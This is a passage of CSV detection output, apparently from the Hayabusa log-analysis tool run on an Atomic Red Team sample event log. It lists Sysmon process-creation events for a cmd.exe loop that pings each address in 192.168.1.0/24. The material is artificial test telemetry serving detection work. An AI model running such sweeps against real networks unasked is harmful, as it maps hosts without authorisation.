192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:09.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.189 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:09.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.190 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:10.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.191 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:10.556 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.192 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:11.022 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.193 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:11.504 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.194 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:12.040 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.195 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:12.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.196 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:13.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.197 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:13.509 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.198 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:14.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.199 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:14.513 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.200 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:15.001 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.201 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:15.518 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.202 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:16.026 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.203 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:16.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.204 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:17.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.205 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:17.438 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.206 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:18.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.207 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:18.544 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.208 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:19.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.209 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:19.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.210 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:20.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.211 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:20.571 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.212 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:21.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.213 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:21.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.214 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:22.035 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.215 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:22.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.216 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:23.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.217 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:23.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.218 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:23.993 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.219 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:24.504 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.220 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:25.008 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.221 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:25.544 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.222 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:26.004 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.223 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:26.430 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.224 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:27.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.225 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:27.555 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.226 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:28.035 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.227 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:28.511 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.228 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:29.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.229 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:29.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.230 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:30.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.231 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:30.521 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.232 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:31.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.233 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:31.530 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.234 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:32.058 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.235 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:32.614 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.236 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:33.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.237 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:33.548 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.238 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:34.005 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.239 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:34.556 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.240 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:35.024 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.241 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:35.559 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.242 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:36.025 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.243 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:53:36.536 